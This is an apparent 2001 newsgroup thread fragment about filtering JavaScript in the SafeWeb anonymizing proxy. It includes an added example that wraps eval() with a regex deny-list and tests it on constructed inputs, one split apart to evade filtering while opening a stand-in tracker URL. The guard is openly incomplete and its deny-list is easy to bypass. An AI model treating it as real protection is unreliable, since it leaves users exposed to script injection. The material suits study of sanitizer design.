Calling for peer review; if I am wrong in anything, please correct me.

Shaddack, the Mad Scientist
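
The eval() replacement proposed in the post above, as an added example that is not part of the original post and is not SafeWeb's code. checkSafe and its deny-list are hypothetical stand-ins for a sanitizer, and the original eval is held in a closure instead of under a per-page random name, so there is no name left to guess.

```javascript
// Added example. checkSafe and its deny-list are hypothetical stand-ins
// for a SafeWeb-style sanitizer; they are not SafeWeb's code.
const DENIED = [
  /\bwindow\s*\.\s*open\b/,
  /\bdocument\s*\.\s*write\b/,
];

function checkSafe(code) {
  for (const pattern of DENIED) {
    if (pattern.test(code)) {
      throw new Error("blocked by eval guard: " + pattern);
    }
  }
  return code;
}

// Replace the global eval with a checking wrapper. The original is kept in
// a closure, so page script has no name through which to call it unchecked.
function installEvalGuard(globalObj, checker) {
  const originalEval = globalObj.eval;
  globalObj.eval = function guardedEval(code) {
    // eval returns non-string arguments unchanged; keep that behaviour.
    if (typeof code !== "string") return code;
    return originalEval(checker(code)); // indirect call: runs in global scope
  };
  return function uninstall() { globalObj.eval = originalEval; };
}

// Constructed inputs: strings a page script might hand to eval().
function demo() {
  const uninstall = installEvalGuard(globalThis, checkSafe);
  const outcome = (code) => {
    try { return String(globalThis.eval(code)); }
    catch (e) { return /^blocked by eval guard/.test(e.message) ? "blocked" : "error"; }
  };
  try {
    return {
      harmless: outcome("6 * 7"),
      // Assembled at run time: the guard sees the final string.
      assembled: outcome("win" + "dow.op" + "en('http://tracker.example/')"),
      // The inner eval resolves to the wrapper too, so nesting is checked.
      nested: outcome("eval('docu' + 'ment.write(1)')"),
      nonString: outcome(42),
    };
  } finally {
    uninstall(); // restore the real eval after the demonstration
  }
}
```

For the guard to be complete, the same wrapping has to be applied to the other string-to-code entry points: the Function constructor and string arguments to setTimeout and setInterval.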

Thomas J. Boschloo

May 9, 2001, 8:10:08 AM
Thomas Shaddack wrote:

> It's possible to re-set eval() function pointer to another function that
> gets executed instead each time eval() is called.

Sounds clever!

But how about an SSL page? I don't think Safeweb will be able to filter
SSL protected pages (or otherwise the whole SSL business of keeping your
credit card info confidential is screwed). It just seems to me that
there remain holes as long as you don't trade it all in for a
client-side solution like ZKS/Freedom.

Not sure about all this however, just guessing,
Thomas
--
"Software patents harm the flow of free information"

